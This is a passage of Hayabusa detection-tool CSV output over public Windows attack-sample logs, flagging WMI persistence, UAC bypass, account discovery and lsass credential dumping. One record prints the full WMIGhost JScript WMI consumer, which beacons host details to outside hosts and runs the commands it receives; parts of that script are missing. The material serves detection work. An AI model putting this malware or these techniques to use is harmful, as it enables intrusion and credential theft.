365ABB72-F76A-5CA4-0000-0010FA0D1700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx 2019-04-04 03:11:54.098 +09:00,PC04.example.corp,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx 2019-04-04 03:11:54.178 +09:00,PC04.example.corp,20,info,,WMI Event Consumer Activity,"Modified | Type: Script | Name: ""ProbeScriptFint"" | Dst: ""var sXmlUrl=\""http://kumardeep.sosblogs.com/The-first-blog-b1/RSS-b1-rss2-posts.htm;http://blogs.rediff.com/anilchopra/feed/;http://www.blogster.com/kapoorsunil09/profile/rss\"";var sOwner='XDD';var MAIN=function(){$=this;$.key='W';$.sFeedUrl=sXmlUrl;$.sOwner=sOwner;$.sXmlUrl='';$.oHttp=null;$.oShell=null;$.oStream=null;$.sHostName=null;$.sOSType=null;$.sMacAddress=null;$.sURLParam=null;$.version='2.0.0';$.runtime=5000;$.oWMI=null;$._x=ActiveXObject;};MAIN.prototype={InitObjects:function(){$.oWMI=GetObject('winmgmts:{impersonationLevel=impersonate}!\\\\\\\\.\\\\root\\\\cimv2');$.oShell=new $._x('WScript.Shell');$.oStream=new $._x('ADODB.Stream');$.GetOSInfo();$.GetMacAddress();$.GenerateUrlParam();},WMI:function(sql){return $.oWMI.ExecQuery(sql);},GetOSInfo:function(){var e=new Enumerator($.WMI('Select * from Win32_OperatingSystem'));if(!e.atEnd()){var item=e.item();$.sOSType=item.Caption+item.ServicePackMajorVersion;$.sHostName=item.CSName;}},GetMacAddress:function(){var e=new Enumerator($.WMI('Select * from Win32_NetworkAdapter where PNPDeviceID like \\\""%PCI%\\\"" and NetConnectionStatus=2'));if(!e.atEnd()){$.sMacAddress=e.item().MACAddress;}},GenerateUrlParam:function(){var time=new Date();$.sURLParam='cstype=server&authname=servername&authpass=serverpass&hostname='+$.sHostName+'&ostype='+$.sOSType+'&macaddr='+$.sMacAddress+'&owner='+$.sOwner+'&version='+$.version+'&runtime='+$.runtime;$.sURLParam+='&t='+time.getMinutes()+time.getSeconds();},CleanObjects:function(){$.oShell=null;$.oStream=null;var e=new Enumerator($.WMI('Select * from Win32_Process where Name=\\\""scrcons.exe\\\""'));while(!e.atEnd()){e.item().terminate();e.moveNext();}},Decode:function(sourceStr){var keycode=sourceStr.charCodeAt(0);var source=sourceStr.substr(1);var vals=source.split(',');var result='';for(var i=0;i@(.*)@<\\/title>+/g;var titleList=response.match(re);for(var i=0;i0){$.oHttp.Open('POST',$.sXmlUrl,false);$.oHttp.setRequestHeader('CONTENT-TYPE','application/x-www-form-urlencoded');$.oHttp.Send($.sURLParam);var response=$.oHttp.ResponseText.replace(/(^\\s*)|(\\s*$)/g,'');if(response.length>0){var commands=null;var container;try{oXml.loadXML(response);container=oXml.getElementsByTagName('div');for(var i=0;i0){commandresult+=',';}commandresult+='\\''+commands[i].id+'\\':\\''+escape(result)+'\\'';}if(commandresult.length>0){commandresult='{'+commandresult+'}';$.oHttp.Open('POST',$.sXmlUrl,false);$.oHttp.setRequestHeader('CONTENT-TYPE','application/x-www-form-urlencoded');$.oHttp.Send($.sURLParam+'&command=result&commandresult='+commandresult);}}else{$.sXmlUrl='';runnum=0;}}$.runtime=(new Date()).getTime()-start.getTime();WScript.Sleep(10000);}if($.sXmlUrl.length>0){return;}}}catch(e){}}},Fire:function(){$.InitObjects();try{$.MainLoop();}catch(e){}$.CleanObjects();}};new MAIN().Fire();"" | User: PC04\IEUser",../hayabusa-rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx 2019-04-04 03:11:54.178 +09:00,PC04.example.corp,20,high,Exec,Suspicious Scripting in a WMI Consumer,,../hayabusa-rules/sigma/wmi_event/sysmon_wmi_susp_scripting.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx 2019-04-04 03:11:54.198 +09:00,PC04.example.corp,21,info,,WMI Event Consumer To Filter Activity,"Modified | Consumer: ""\\\\.\\root\\subscription:ActiveScriptEventConsumer.Name=\""ProbeScriptFint\"""" | Filter: ""\\\\.\\root\\subscription:__EventFilter.Name=\""ProbeScriptFint\""""",../hayabusa-rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx 2019-04-04 03:12:00.016 +09:00,PC04.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\scrcons.exe -Embedding | Process: C:\Windows\System32\wbem\scrcons.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 2636 | PGUID: 365ABB72-F76F-5CA4-0000-0010AA201700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx 2019-04-04 03:12:00.016 +09:00,PC04.example.corp,1,high,Persis | PrivEsc,WMI Persistence - Script Event Consumer,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx 2019-04-19 01:55:37.014 +09:00,IEWIN7,16,info,,Sysmon Config Change,C:\Users\IEUser\Desktop\Sysmon.exe -i,../hayabusa-rules/hayabusa/sysmon/events/16_SysmonConfigChange.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:55:37.014 +09:00,IEWIN7,16,medium,Evas,Sysmon Configuration Change,,../hayabusa-rules/sigma/sysmon/sysmon_config_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:55:37.115 +09:00,IEWIN7,4,info,,Sysmon Service State Changed,State: Started | SchemaVersion: 4.20,../hayabusa-rules/hayabusa/sysmon/events/4_SysmonServiceStateChanged.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:55:37.125 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\Sysmon.exe | Process: C:\Windows\Sysmon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:55:37.125 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\unsecapp.exe -Embedding | Process: C:\Windows\System32\wbem\unsecapp.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 3232 | PGUID: 365ABB72-AC09-5CB8-0000-0010999C0700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:55:38.076 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\Sysmon.exe | PID: 2000 | PGUID: 365ABB72-AC06-5CB8-0000-001059830700,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:55:44.045 +09:00,IEWIN7,1,info,,Process Created,"Cmd: sysmon -c sysmonconfig-18-apr-2019.xml | Process: C:\Users\IEUser\Desktop\Sysmon.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop"" | LID: 0xca21 | PID: 3252 | PGUID: 365ABB72-AC10-5CB8-0000-001047A40700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:55:44.045 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:55:44.135 +09:00,IEWIN7,16,info,,Sysmon Config Change,C:\Users\IEUser\Desktop\sysmonconfig-18-apr-2019.xml,../hayabusa-rules/hayabusa/sysmon/events/16_SysmonConfigChange.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:55:44.135 +09:00,IEWIN7,16,medium,Evas,Sysmon Configuration Change,,../hayabusa-rules/sigma/sysmon/sysmon_config_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:55:44.145 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\Sysmon.exe | PID: 3252 | PGUID: 365ABB72-AC10-5CB8-0000-001047A40700,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:55:51.275 +09:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\Sysmon.exe | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:55:51.275 +09:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates | Process: C:\Windows\Sysmon.exe | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:55:51.275 +09:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\Sysmon.exe | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:55:51.285 +09:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates | Process: C:\Windows\Sysmon.exe | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:56:08.370 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: Powershell | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop"" | LID: 0xca21 | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:56:08.370 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:56:24.893 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1033,technique_name=System Owner/User Discovery | Cmd: ""C:\Windows\system32\whoami.exe"" /user | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: Powershell | LID: 0xca21 | PID: 3576 | PGUID: 365ABB72-AC38-5CB8-0000-0010365E0800 | Hash: SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:56:24.893 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:56:24.893 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:57:04.681 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1088,technique_name=Bypass User Account Control | Cmd: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Process: C:\Windows\System32\mmc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\eventvwr.exe"" | LID: 0xca21 | PID: 3900 | PGUID: 365ABB72-AC60-5CB8-0000-001037BA0800 | Hash: SHA1=98D8C5E38510C6220F42747D15F6FFF75DD59845,MD5=A2A5D487D0C3D55739A0491B6872480D,SHA256=40E2B83F07771D54CE4E45B76A14883D042766FF4E1E7872E482EC91E81E9484,IMPHASH=6D2ED4ADDAC7EBAE62381320D82AC4C1",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:57:06.954 +09:00,IEWIN7,11,medium,,File Created_Sysmon Alert,undefined | Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan | Process: C:\Windows\system32\svchost.exe | PID: 912 | PGUID: 365ABB72-AB26-5CB8-0000-0010D1AE0000,../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:57:52.910 +09:00,IEWIN7,3,medium,,Network Connection_Sysmon Alert,"technique_id=T1031,technique_name=Modify Existing Service | tcp | Src: fe80:0:0:0:80ac:4126:fa58:1b81:49158 (IEWIN7) | Dst: fe80:0:0:0:80ac:4126:fa58:1b81:135 (IEWIN7) | User: IEWIN7\IEUser | Process: C:\Windows\System32\mmc.exe | PID: 3900 | PGUID: 365ABB72-AC60-5CB8-0000-001037BA0800",../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:58:12.979 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\cryptdll.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:58:13.389 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\samlib.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:58:13.650 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\hid.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:58:13.740 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\WinSCard.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=1C4EA79DABE347BA378654FD2C6EE51B3C7B2868,MD5=9419ABF3163B6F0E3AD3DD2B381C879F,SHA256=75029AFDB5F8A8F74A63B6C8165E77110E2FBAEC0021A9613035BFFEC646A54E,IMPHASH=C9D7A0D2005B11C675EA66DFAC2C77E9",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,,Process Access_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 1200 | Src PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Tgt PID: 472 | Tgt PGUID: 365ABB72-29B3-5CB9-0000-001087490000",../hayabusa-rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,../hayabusa-rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 01:58:14.871 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\vaultcli.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 02:00:09.977 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1033,technique_name=System Owner/User Discovery | Cmd: ""C:\Windows\system32\whoami.exe"" /user | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: Powershell | LID: 0xca21 | PID: 3980 | PGUID: 365ABB72-AD19-5CB8-0000-0010F4F40C00 | Hash: SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 02:00:09.977 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 02:00:09.977 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 02:01:34.168 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\cryptdll.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 02:01:34.448 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\samlib.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 02:01:34.659 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\hid.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 02:01:34.689 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\WinSCard.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=1C4EA79DABE347BA378654FD2C6EE51B3C7B2868,MD5=9419ABF3163B6F0E3AD3DD2B381C879F,SHA256=75029AFDB5F8A8F74A63B6C8165E77110E2FBAEC0021A9613035BFFEC646A54E,IMPHASH=C9D7A0D2005B11C675EA66DFAC2C77E9",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 02:01:35.680 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\vaultcli.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,,Process Access_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 1200 | Src PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Tgt PID: 472 | Tgt PGUID: 365ABB72-29B3-5CB9-0000-001087490000",../hayabusa-rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials 